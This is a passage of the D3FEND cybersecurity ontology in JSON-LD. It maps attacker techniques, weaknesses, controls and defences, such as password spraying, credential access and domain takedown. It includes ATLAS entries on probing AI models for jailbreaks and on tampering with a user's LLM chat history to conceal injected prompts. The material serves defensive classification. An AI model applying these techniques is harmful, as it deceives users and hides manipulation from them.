      "d3f:definition": "Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage.  Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.",
      "rdfs:label": "Cloud Storage Object Discovery",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DiscoveryTechnique"
        },
        {
          "@id": "_:N168a51beefa54a7d987e729ecf66ab04"
        }
      ]
    },
    {
      "@id": "_:N168a51beefa54a7d987e729ecf66ab04",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudStorage"
      }
    },
    {
      "@id": "d3f:ServiceStartEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the initiation of a service application, transitioning it from an inactive state to an active state, enabling its background or networked operations.",
      "rdfs:label": "Service Start Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationStartEvent"
        },
        {
          "@id": "d3f:ServiceEvent"
        },
        {
          "@id": "_:Nc4a541c5590140c7aba0f2a6af13fb2e"
        }
      ]
    },
    {
      "@id": "_:Nc4a541c5590140c7aba0f2a6af13fb2e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ServiceInstallationEvent"
      }
    },
    {
      "@id": "d3f:SlowSymbolicLink",
      "@type": "owl:Class",
      "d3f:definition": "A slow symbolic link is any symbolic link on a Unix filesystem that is not a fast symbolic link; slow symlink is thus retroactively termed from fast symlink.  Slow symbolic links stored the symbolic link information as data in regular files.",
      "rdfs:label": "Slow Symbolic Link",
      "rdfs:seeAlso": {
        "@id": "http://dbpedia.org/resource/Symbolic_link#Storage_of_symbolic_links"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SymbolicLink"
        },
        {
          "@id": "d3f:UnixLink"
        }
      ],
      "skos:altLabel": "Slow Symlink"
    },
    {
      "@id": "d3f:T1081",
      "@type": "owl:Class",
      "d3f:attack-id": "T1081",
      "d3f:definition": "Adversaries may search local file systems and remote file shares for files containing passwords. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1552.001",
      "rdfs:label": "Credentials in Files",
      "rdfs:seeAlso": {
        "@id": "d3f:T1552.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CredentialAccessTechnique"
      }
    },
    {
      "@id": "d3f:Reference-PrivateApplicationAccessWithBrowserIsolation",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20210250333A1"
      },
      "d3f:kb-reference-of": {
        "@id": "d3f:Application-basedProcessIsolation"
      },
      "d3f:kb-reference-title": "Private application access with browser isolation",
      "rdfs:label": "Reference - Private application access with browser isolation"
    },
    {
      "@id": "d3f:T1091",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1091",
      "d3f:definition": "Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.",
      "d3f:executes": {
        "@id": "d3f:RemovableMediaDevice"
      },
      "rdfs:label": "Replication Through Removable Media",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:InitialAccessTechnique"
        },
        {
          "@id": "d3f:LateralMovementTechnique"
        },
        {
          "@id": "_:Na4569d3982be46c39df7726a4b916c3c"
        }
      ]
    },
    {
      "@id": "_:Na4569d3982be46c39df7726a4b916c3c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:executes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RemovableMediaDevice"
      }
    },
    {
      "@id": "d3f:CWE-1258",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1258",
      "d3f:definition": "The hardware does not fully clear security-sensitive values, such as keys and intermediate values in cryptographic operations, when debug mode is entered.",
      "rdfs:label": "Exposure of Sensitive System Information Due to Uncleared Debug Information",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-200"
        },
        {
          "@id": "d3f:CWE-212"
        }
      ]
    },
    {
      "@id": "d3f:CWE-331",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-331",
      "d3f:definition": "The product uses an algorithm or scheme that produces insufficient entropy, leaving patterns or clusters of values that are more likely to occur than others.",
      "rdfs:label": "Insufficient Entropy",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-330"
      }
    },
    {
      "@id": "d3f:end",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "end",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-process-object-property"
      }
    },
    {
      "@id": "dcterms:description",
      "@type": "owl:AnnotationProperty"
    },
    {
      "@id": "d3f:T1521.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1521.001",
      "d3f:definition": "Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic, rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, Blowfish, and RC4.",
      "rdfs:label": "Symmetric Cryptography - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1521"
      },
      "skos:prefLabel": "Symmetric Cryptography"
    },
    {
      "@id": "d3f:ProjectedClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PC",
      "d3f:definition": "Projected clustering is a dimension reduction subspace clustering method.",
      "d3f:kb-article": "## References\nGeeksforGeeks. (n.d.). Projected Clustering in Data Analytics. [Link](https://www.geeksforgeeks.org/projected-clustering-in-data-analytics/)",
      "rdfs:label": "Projected Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:High-dimensionClustering"
      }
    },
    {
      "@id": "d3f:OperatingModeMonitoring",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OperatingModeMonitoring"
      ],
      "d3f:d3fend-id": "D3-OMM",
      "d3f:definition": "Detects operating modes such as Program, Run, Remote, or Stop.",
      "d3f:kb-article": "## How it works\nMany OT Controllers have key switches to change the controller into various modes of operation. These modes of operation can include Program, Run, Remote, or Stop.\n\nThe key switch position is often available as a system diagnostic function block of the programming logic.\n\n## Considerations\n* It is advised to configure a key switch alarm such that an operator is alerted when the controller is put into a programming mode, as this could indicate unintentional or malicious changes to operational code.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-PLCKeySwitchMonitoring"
        },
        {
          "@id": "d3f:Reference-TRITONMalwareRemainsThreattoGlobalCriticalInfrastructureICS"
        }
      ],
      "d3f:monitors": {
        "@id": "d3f:OTControllerOperatingMode"
      },
      "rdfs:label": "Operating Mode Monitoring",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PlatformMonitoring"
        },
        {
          "@id": "_:N927a0c96f9d64de781d0fb7d5027949d"
        }
      ]
    },
    {
      "@id": "_:N927a0c96f9d64de781d0fb7d5027949d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "d3f:T1559.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1559.003",
      "d3f:definition": "Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service <code>C API</code> or the high level <code>NSXPCConnection API</code> in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)",
      "rdfs:label": "XPC Services",
      "rdfs:subClassOf": {
        "@id": "d3f:T1559"
      }
    },
    {
      "@id": "d3f:OTControllerOperatingMode",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The OT controller operating mode designates the specific, selectable state of an OT controller that delineates its operational behavior and governs access to engineering functions, commonly including Program, Run, Remote, Test, or Stop.",
      "d3f:synonym": "Keyswitch Position",
      "rdfs:label": "OT Controller Operating Mode",
      "rdfs:subClassOf": {
        "@id": "d3f:OperatingMode"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-6_10",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Least Privilege | Prohibit Non-privileged Users from Executing Privileged Functions",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:LocalFilePermissions"
        },
        {
          "@id": "d3f:SystemConfigurationPermissions"
        }
      ],
      "rdfs:label": "AC-6(10)"
    },
    {
      "@id": "d3f:DS0042",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "Visual activity on the device that could alert the user to potentially malicious behavior.",
      "rdfs:comment": "This data source currently has no mappings to digital artifacts, but may be updated in future releases.",
      "rdfs:label": "User Interface (ATT&CK DS)"
    },
    {
      "@id": "d3f:Point-biserialCorrelationCoefficient",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PBCC",
      "d3f:definition": "The point biserial correlation coefficient (rpb) is a correlation coefficient used when one variable (e.g. Y) is dichotomous; Y can either be \"naturally\" dichotomous, like whether a coin lands heads or tails, or an artificially dichotomized variable.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Point-biserial correlation coefficient. [Link](https://en.wikipedia.org/wiki/Point-biserial_correlation_coefficient)",
      "rdfs:label": "Point-biserial Correlation Coefficient",
      "rdfs:subClassOf": {
        "@id": "d3f:Correlation"
      }
    },
    {
      "@id": "d3f:CWE-156",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-156",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as whitespace when they are sent to a downstream component.",
      "d3f:synonym": "White space",
      "rdfs:label": "Improper Neutralization of Whitespace",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-138"
      }
    },
    {
      "@id": "d3f:CCI-000196_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, for password-based authentication, stores only cryptographically-protected passwords.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:StrongPasswordPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-15T00:00:00"
      },
      "rdfs:label": "CCI-000196"
    },
    {
      "@id": "d3f:CCI-000162_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system protects audit information from unauthorized access.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:CredentialHardening"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-22T00:00:00"
      },
      "rdfs:label": "CCI-000162"
    },
    {
      "@id": "d3f:CWE-922",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-922",
      "d3f:definition": "The product stores sensitive information without properly limiting read or write access by unauthorized actors.",
      "rdfs:label": "Insecure Storage of Sensitive Information",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:CredentialAccessTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:Credential"
      },
      "d3f:enables": {
        "@id": "d3f:TA0006"
      },
      "d3f:may-access": {
        "@id": "d3f:PasswordFile"
      },
      "d3f:may-invoke": {
        "@id": "d3f:CreateProcess"
      },
      "rdfs:label": "Credential Access Technique",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTechnique"
        },
        {
          "@id": "d3f:OffensiveTechnique"
        },
        {
          "@id": "_:N54eac1bf8c64455f92565792e9199926"
        },
        {
          "@id": "_:N3f5eca0e6b704601afc9f13693302f25"
        },
        {
          "@id": "_:Nf88f1d48f6c1446a9cbe336f83f44b32"
        },
        {
          "@id": "_:N1ae3ef89c61e495ba51d9d0e090c1301"
        }
      ]
    },
    {
      "@id": "_:N54eac1bf8c64455f92565792e9199926",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "_:N3f5eca0e6b704601afc9f13693302f25",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0006"
      }
    },
    {
      "@id": "_:Nf88f1d48f6c1446a9cbe336f83f44b32",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PasswordFile"
      }
    },
    {
      "@id": "_:N1ae3ef89c61e495ba51d9d0e090c1301",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "d3f:CommandAndControlTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The adversary is trying to communicate with compromised systems to control them.",
      "d3f:enables": {
        "@id": "d3f:TA0011"
      },
      "rdfs:label": "Command and Control Technique",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTechnique"
        },
        {
          "@id": "d3f:OffensiveTechnique"
        },
        {
          "@id": "_:N3638b3db57504654924adb3556b3b625"
        }
      ]
    },
    {
      "@id": "_:N3638b3db57504654924adb3556b3b625",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0011"
      }
    },
    {
      "@id": "d3f:may-create",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x may-create y: The entity x may create the entity y; that is, 'x creates y' may be true.",
      "rdfs:label": "may-create",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:OSAPICreateThread",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that creates a new thread of execution within a process.",
      "d3f:invokes": {
        "@id": "d3f:CreateThread"
      },
      "rdfs:label": "OS API Create Thread",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N75c1ab66662b47719c344882fdd8d8de"
        }
      ]
    },
    {
      "@id": "_:N75c1ab66662b47719c344882fdd8d8de",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateThread"
      }
    },
    {
      "@id": "d3f:CreateProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": [
        "A process spawn refers to a function that loads and executes a new child process. The current process may wait for the child to terminate or may continue to execute asynchronously. Creating a new subprocess requires enough memory in which both the child process and the current program can execute. There is a family of spawn functions in DOS, inherited by Microsoft Windows. There is also a different family of spawn functions in an optional extension of the POSIX standards. Fork-exec is another technique combining two Unix system calls, which can effect a process spawn.",
        "Creates a process.",
        "Executes a process."
      ],
      "d3f:executes": {
        "@id": "d3f:Process"
      },
      "rdfs:label": "Create Process",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Fork%E2%80%93exec"
        },
        {
          "@id": "dbr:Spawn_(computing)"
        },
        {
          "@id": "https://dbpedia.org/page/Fork%E2%80%93exec"
        },
        {
          "@id": "https://dbpedia.org/page/Spawn_(computing)"
        },
        {
          "@id": "https://docs.microsoft.com/en-us/windows/win32/procthread/creating-processes"
        },
        {
          "@id": "https://learn.microsoft.com/en-us/windows/win32/procthread/creating-processes"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N8f2df3bfb0534f959cec74d07097e066"
        }
      ],
      "skos:altLabel": [
        "Execute Process",
        "Process Spawn",
        "Spawn Process"
      ]
    },
    {
      "@id": "_:N8f2df3bfb0534f959cec74d07097e066",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:executes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:CCI-002364_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system displays an explicit logout message to users indicating the reliable termination of authenticated communications sessions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:ProcessTermination"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-26T00:00:00"
      },
      "rdfs:label": "CCI-002364"
    },
    {
      "@id": "d3f:AssignPrivilegesToGroupEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where specific privileges or rights are granted to a group, enabling its members to perform actions or access resources as defined by the privileges.",
      "rdfs:label": "Assign Privileges to Group Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:GroupManagementEvent"
        },
        {
          "@id": "d3f:PermissionGrantingEvent"
        },
        {
          "@id": "_:N45308e29ad0f45569e72e94d8980f31b"
        }
      ]
    },
    {
      "@id": "_:N45308e29ad0f45569e72e94d8980f31b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GroupCreationEvent"
      }
    },
    {
      "@id": "d3f:analyzes",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x analyzes y: The subject x breaks down object y into components or essential features, assessing y by quantitative methods, qualitative methods, or both.  Usually the analysis is done in terms of some model or framework.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00738221-v"
      },
      "rdfs:label": "analyzes",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:detects"
        }
      ]
    },
    {
      "@id": "d3f:CCI-002465_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system requests data origin authentication verification on the name/address resolution responses the system receives from authoritative sources.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DomainTrustPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002465"
    },
    {
      "@id": "d3f:M1033",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": [
        {
          "@id": "d3f:ExecutableAllowlisting"
        },
        {
          "@id": "d3f:ExecutableDenylisting"
        }
      ],
      "rdfs:label": "Limit Software Installation"
    },
    {
      "@id": "d3f:T1579",
      "@type": "owl:Class",
      "d3f:attack-id": "T1579",
      "d3f:definition": "Adversaries may collect the keychain storage data from an iOS device to acquire credentials. Keychains are the built-in way for iOS to keep track of users' passwords and credentials for many services and features such as Wi-Fi passwords, websites, secure notes, certificates, private keys, and VPN credentials.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1634.001",
      "rdfs:label": "Keychain - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1634.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCredentialAccessTechnique"
      },
      "skos:prefLabel": "Keychain"
    },
    {
      "@id": "d3f:DE-0006",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "DE-0006",
      "d3f:definition": "Threat actors may target whitelists on the spacecrafts as a means to execute and/or hide malicious processes/programs. Whitelisting is a common technique used on traditional IT systems but has also been used on spacecrafts. Whitelisting is used to prevent execution of unknown or potentially malicious software. However, this technique can be bypassed if not implemented correctly but threat actors may also simply attempt to modify the whitelist outright to ensure their malicious software will operate on the spacecraft that utilizes whitelisting.",
      "d3f:modifies": {
        "@id": "d3f:AccessControlConfiguration"
      },
      "rdfs:label": "Modify Whitelist - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0006/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTADefenseEvasionTechnique"
        },
        {
          "@id": "_:N2bfc86ed709a4892a2daa34404100121"
        }
      ],
      "skos:prefLabel": "Modify Whitelist"
    },
    {
      "@id": "_:N2bfc86ed709a4892a2daa34404100121",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessControlConfiguration"
      }
    },
    {
      "@id": "d3f:T1564.011",
      "@type": "owl:Class",
      "d3f:attack-id": "T1564.011",
      "d3f:definition": "Adversaries may evade defensive mechanisms by executing commands that hide from process interrupt signals. Many operating systems use signals to deliver messages to control process behavior. Command interpreters often include specific commands/flags that ignore errors and other hangups, such as when the user of the active session logs off.(Citation: Linux Signal Man)  These interrupt signals may also be used by defensive tools and/or analysts to pause or terminate specified running processes.",
      "rdfs:label": "Ignore Process Interrupts",
      "rdfs:subClassOf": {
        "@id": "d3f:T1564"
      }
    },
    {
      "@id": "d3f:CWE-1331",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1331",
      "d3f:definition": "The Network On Chip (NoC) does not isolate or incorrectly isolates its on-chip-fabric and internal resources such that they are shared between trusted and untrusted agents, creating timing channels.",
      "rdfs:label": "Improper Isolation of Shared Resources in Network On Chip (NoC)",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-653"
        },
        {
          "@id": "d3f:CWE-668"
        }
      ]
    },
    {
      "@id": "d3f:CWE-821",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-821",
      "d3f:definition": "The product utilizes a shared resource in a concurrent manner, but it does not correctly synchronize access to the resource.",
      "rdfs:label": "Incorrect Synchronization",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-662"
      }
    },
    {
      "@id": "d3f:InitialAccessTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The adversary is trying to get into your network.",
      "d3f:enables": {
        "@id": "d3f:TA0001"
      },
      "rdfs:label": "Initial Access Technique",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTechnique"
        },
        {
          "@id": "d3f:OffensiveTechnique"
        },
        {
          "@id": "_:N37c0b8c3332a4402b1644c117c281438"
        }
      ]
    },
    {
      "@id": "_:N37c0b8c3332a4402b1644c117c281438",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0001"
      }
    },
    {
      "@id": "d3f:CWE-127",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-127",
      "d3f:definition": "The product reads from a buffer using buffer access mechanisms such as indexes or pointers that reference memory locations prior to the targeted buffer.",
      "rdfs:label": "Buffer Under-read",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-125"
        },
        {
          "@id": "d3f:CWE-786"
        }
      ]
    },
    {
      "@id": "d3f:AML.T0040",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0040",
      "d3f:definition": "Adversaries may gain access to a model via legitimate access to the inference API.\nInference API access can be a source of information to the adversary ([Discover AI Model Ontology](/techniques/AML.T0013), [Discover AI Model Family](/techniques/AML.T0014)), a means of staging the attack ([Verify Attack](/techniques/AML.T0042), [Craft Adversarial Data](/techniques/AML.T0043)), or for introducing data to the target system for Impact ([Evade AI Model](/techniques/AML.T0015), [Erode AI Model Integrity](/techniques/AML.T0031)).\n\nMany systems rely on the same models provided via an inference API, which means they share the same vulnerabilities. This is especially true of foundation models which are prohibitively resource intensive to train. Adversaries may use their access to model APIs to identify vulnerabilities such as jailbreaks or hallucinations and then target applications that use the same models.",
      "rdfs:label": "AI Model Inference API Access - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0040"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASAIModelAccessTechnique"
      },
      "skos:prefLabel": "AI Model Inference API Access"
    },
    {
      "@id": "d3f:AML.T0092",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0092",
      "d3f:definition": "Adversaries may manipulate a user's large language model (LLM) chat history to cover the tracks of their malicious behavior. They may hide persistent changes they have made to the LLM's behavior, or obscure their attempts at discovering private information about the user.\n\nTo do so, adversaries may delete or edit existing messages or create new threads as part of their coverup. This is feasible if the adversary has the victim's authentication tokens for the backend LLM service or if they have direct access to the victim's chat interface.\n\nChat interfaces (especially desktop interfaces) often do not show the injected prompt for any ongoing chat, as they update chat history only once when initially opening it. This can help the adversary's manipulations go unnoticed by the victim.",
      "rdfs:label": "Manipulate User LLM Chat History - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0092"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Manipulate User LLM Chat History"
    },
    {
      "@id": "d3f:ST0003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SPARTATactic"
      ],
      "d3f:definition": "Threat actor is trying to get point of presence/command execution on the spacecraft.",
      "d3f:display-order": 3,
      "rdfs:label": "Initial Access - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/tactic/ST0003"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OffensiveTactic"
        },
        {
          "@id": "d3f:SPARTATactic"
        }
      ],
      "skos:prefLabel": "Initial Access"
    },
    {
      "@id": "d3f:DomainRegistrationTakedown",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DomainRegistrationTakedown"
      ],
      "d3f:d3fend-id": "D3-DRT",
      "d3f:definition": "The process of performing a takedown of the attacker's domain registration infrastructure.",
      "d3f:deletes": {
        "@id": "d3f:DomainRegistration"
      },
      "d3f:kb-article": "## How it works\n\nMost nameserver hosts and domain name registrars comply with internationally recognised standards and supply their services based on terms and conditions that provide users and organisations protection from abuse and trademark infringement. Performing a WHOIS query on the attacker's domain will provide a contact that can be notified in the case of abuse. Formal takedown processes should be initiated to suspend or disable the normal function of the domain name.\n\n## Considerations\n\n- Takedown notifications should clearly demonstrate (with evidence) that the nameserver's or registrar's Terms and Conditions have been breached.\n- Takedown processes are notoriously slow and sometimes unsuccessful.\n- Many government organisations will have takedown processes that should also be followed. They may use this for intelligence to assist other organisations suffering an attack.\n- Top level domain registrars will have takedown processes that can be followed, as an escalation path, when the nameserver host and/or registrar have not responded or complied timeously or in line with the TLD expectations.\n\n## Examples of Domain Registration Abuse\n\nAttackers will create infrastructure from which to carry out their operations and this may include registering domain names to be used in the various attacks. Known misuse cases include:\n\n- Registering domain names that are similar to the victim's. This is known as typosquatting or URL hijacking. Legitimate-looking mails or URLs could be sent using this domain in phishing campaigns.\n- Registering domain names that are used in C2 beacons.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-UnderstandingtheDomainRegistrationBehaviorofSpammers"
      },
      "rdfs:label": "Domain Registration Takedown",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ObjectEviction"
        },
        {
          "@id": "_:Nd005c2757cad4256a73bdc895574e623"
        }
      ]
    },
    {
      "@id": "_:Nd005c2757cad4256a73bdc895574e623",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:deletes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DomainRegistration"
      }
    },
    {
      "@id": "d3f:T1110.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:Password"
      },
      "d3f:attack-id": "T1110.003",
      "d3f:definition": "Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)",
      "d3f:may-create": {
        "@id": "d3f:IntranetAdministrativeNetworkTraffic"
      },
      "d3f:modifies": {
        "@id": "d3f:AuthenticationLog"
      },
      "d3f:produces": {
        "@id": "d3f:Authentication"
      },
      "rdfs:label": "Password Spraying",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1110"
        },
        {
          "@id": "_:Ne2694d4c1e8c48fdbf2b9eac23cd4db2"
        },
        {
          "@id": "_:Nfab04cc48cb84fbb9e81e09759cfd447"
        },
